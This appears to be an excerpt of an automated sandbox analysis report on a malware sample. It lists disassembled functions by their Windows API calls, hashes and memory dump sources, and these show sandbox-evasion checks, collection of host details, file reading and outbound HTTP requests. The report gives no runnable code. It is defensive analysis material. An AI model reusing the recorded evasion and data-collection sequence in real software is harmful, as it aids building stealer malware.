                                            • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                            • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                            • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A51
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A68
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A7F
                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023E4AA0
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 023E4AB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                            • Instruction ID: 9154ffe0602603f4c8220663f3262f226cac1a5d06ebb7a96f6d41b1ff4ac9a6
                                            • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                            • Instruction Fuzzy Hash: 602129B5D00219ABDF24DFA4E849AED7B75FF44321F108225F929A7290EB706A05CF91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F790B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F7912
                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 023F7944
                                            • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 023F7965
                                            • RegCloseKey.ADVAPI32(00000000), ref: 023F796F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3225020163-2517555085
                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction ID: 0643a1498e0a2cdeb31d432c6d8dca0fb0182b62e3f1f930d0e2d809f6e96a77
                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction Fuzzy Hash: B9012CB9A80204BBEB10DBE0ED49FAEB7BDEB48701F005154BA0596291D6749900CB51
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                            • RegOpenKeyExA.ADVAPI32(80000002,00799EC8,00000000,00020119,00000000), ref: 004176DD
                                            • RegQueryValueExA.ADVAPI32(00000000,007CAC50,00000000,00000000,?,000000FF), ref: 004176FE
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3466090806-2517555085
                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                            • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                            • RegOpenKeyExA.ADVAPI32(80000002,00799EC8,00000000,00020119,004176B9), ref: 0041775B
                                            • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                            • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: CurrentBuildNumber
                                            • API String ID: 3466090806-1022791448
                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                            • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                            APIs
                                            • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                            • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                            • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID: :A$:A
                                            • API String ID: 1378416451-1974578005
                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023E75A1
                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023E7618
                                            • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 023E7674
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023E76B9
                                            • HeapFree.KERNEL32(00000000), ref: 023E76C0
                                              • Part of subcall function 023E94A7: vsprintf_s.MSVCRT ref: 023E94C2
                                            • task.LIBCPMTD ref: 023E77BC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                            • String ID:
                                            • API String ID: 700816787-0
                                            • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                            • Instruction ID: 94ac2426f2ac48beaefee342d5107526b18a9488370b618be5cccae3345198e0
                                            • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                            • Instruction Fuzzy Hash: 78610FB5D101689BDF24DB50CC55FE9B7B9BF48304F0081E9E64AA6180EB709BC9CF95
                                            APIs
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 023E6548
                                              • Part of subcall function 023E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 023E656A
                                              • Part of subcall function 023E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023E659C
                                              • Part of subcall function 023E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023E65EC
                                              • Part of subcall function 023E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023E6626
                                              • Part of subcall function 023E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023E6638
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 023F557F
                                            • lstrlen.KERNEL32(00000000), ref: 023F5596
                                              • Part of subcall function 023F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023F90B9
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 023F55CB
                                            • lstrlen.KERNEL32(00000000), ref: 023F55EA
                                            • strtok.MSVCRT(00000000,?), ref: 023F5605
                                            • lstrlen.KERNEL32(00000000), ref: 023F5615
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID:
                                            • API String ID: 3532888709-0
                                            • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                            • Instruction ID: 921e1359252414194bfa0507eb0f6f3cc903e1d949bcaef60a3338a4f6c344a9
                                            • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                            • Instruction Fuzzy Hash: 5F51DB71910248DBCF68FF64EEA5EEE7776AF10301F904029EA0A66690DF346B49CF51
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 023F7345
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,023F7574,004205BD), ref: 023F7383
                                            • memset.MSVCRT ref: 023F73D1
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 023F7525
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID:
                                            • API String ID: 224852652-0
                                            • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                            • Instruction ID: 59e8b298286959868abf7fa458a9bf1a511500e06bfce0cd1ca5ab9d20a88045
                                            • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                            • Instruction Fuzzy Hash: 005170B1D002189FDFA4DBA0EC94FEDF775AF44305F5041A9E609A7181DB746A88CF58
                                            APIs
                                            • memset.MSVCRT ref: 023F433C
                                            • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 023F435B
                                            • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 023F437F
                                            • RegCloseKey.ADVAPI32(?), ref: 023F4389
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F43AE
                                            • lstrcat.KERNEL32(?,0064A168), ref: 023F43C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                            • Instruction ID: be657a4adb56ff840a32f4eb2636b6438a3c0ec39823aa7a2f8ab254d966fc6b
                                            • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                            • Instruction Fuzzy Hash: DC4187B6940108BBDB24EBE0EC46FEE737EAB49700F004558A729571C0EA755B8C8FE1
                                            APIs
                                            • memset.MSVCRT ref: 004140D5
                                            • RegOpenKeyExA.ADVAPI32(80000001,007CB858,00000000,00020119,?), ref: 004140F4
                                            • RegQueryValueExA.ADVAPI32(?,007CC650,00000000,00000000,00000000,000000FF), ref: 00414118
                                            • RegCloseKey.ADVAPI32(?), ref: 00414122
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                            • lstrcatA.KERNEL32(?,007CC620), ref: 0041415B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                            • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                            • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                            • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                            APIs
                                            • strtok_s.MSVCRT ref: 00413588
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • strtok_s.MSVCRT ref: 004136D1
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpystrtok_s$lstrlen
                                            • String ID:
                                            • API String ID: 3184129880-0
                                            • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                            • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                            • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                            • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                            APIs
                                            • __lock.LIBCMT ref: 0041B39A
                                              • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                              • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                              • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                                            • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                                              • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                            • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 2005412495-0
                                            • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                            • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                                            • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                            • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                            APIs
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 023F9B08
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 023F9B21
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 023F9B39
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 023F9B51
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 023F9B6A
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,Xry), ref: 023F9B82
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 023F9B9A
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 023F9BB3
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 023F9BCB
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 023F9BE3
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 023F9BFC
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 023F9C14
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,XWy), ref: 023F9C2C
                                              • Part of subcall function 023F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 023F9C45
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023E1437: ExitProcess.KERNEL32 ref: 023E1478
                                              • Part of subcall function 023E13C7: GetSystemInfo.KERNEL32(?), ref: 023E13D1
                                              • Part of subcall function 023E13C7: ExitProcess.KERNEL32 ref: 023E13E5
                                              • Part of subcall function 023E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 023E1392
                                              • Part of subcall function 023E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 023E1399
                                              • Part of subcall function 023E1377: ExitProcess.KERNEL32 ref: 023E13AA
                                              • Part of subcall function 023E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023E14A5
                                              • Part of subcall function 023E1487: __aulldiv.LIBCMT ref: 023E14BF
                                              • Part of subcall function 023E1487: __aulldiv.LIBCMT ref: 023E14CD
                                              • Part of subcall function 023E1487: ExitProcess.KERNEL32 ref: 023E14FB
                                              • Part of subcall function 023F69D7: GetUserDefaultLangID.KERNEL32 ref: 023F69DB
                                              • Part of subcall function 023E13F7: ExitProcess.KERNEL32 ref: 023E142D
                                              • Part of subcall function 023F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,023E141E), ref: 023F7AE7
                                              • Part of subcall function 023F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 023F7AEE
                                              • Part of subcall function 023F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 023F7B06
                                              • Part of subcall function 023F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F7B77
                                              • Part of subcall function 023F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 023F7B7E
                                              • Part of subcall function 023F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 023F7B96
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 023F6D31
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 023F6D4F
                                            • CloseHandle.KERNEL32(00000000), ref: 023F6D60
                                            • Sleep.KERNEL32(00001770), ref: 023F6D6B
                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 023F6D81
                                            • ExitProcess.KERNEL32 ref: 023F6D89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2525456742-0
                                            • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                            • Instruction ID: 2139d381a03cc160fdee91cac5d9f20c937dc4c746701428d06926deb6a7a81b
                                            • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                            • Instruction Fuzzy Hash: 9F313A76A40218ABDFA4FBF0EC55FFE737AAF14300F504529E616A6190EF745A08CE61
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023E9C53
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 023E9C78
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 023E9C98
                                            • ReadFile.KERNEL32(000000FF,?,00000000,023E16F6,00000000), ref: 023E9CC1
                                            • LocalFree.KERNEL32(023E16F6), ref: 023E9CF7
                                            • CloseHandle.KERNEL32(000000FF), ref: 023E9D01
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                            • Instruction ID: 7a305e43084f297f7b38808fa82ac650e677b4f857bf46161f0e06437ac0da56
                                            • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                            • Instruction Fuzzy Hash: F831F6B8A00209EFDF14DF94D885BAE77F5FB49314F108158E916A7290C774AA45CFA1
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
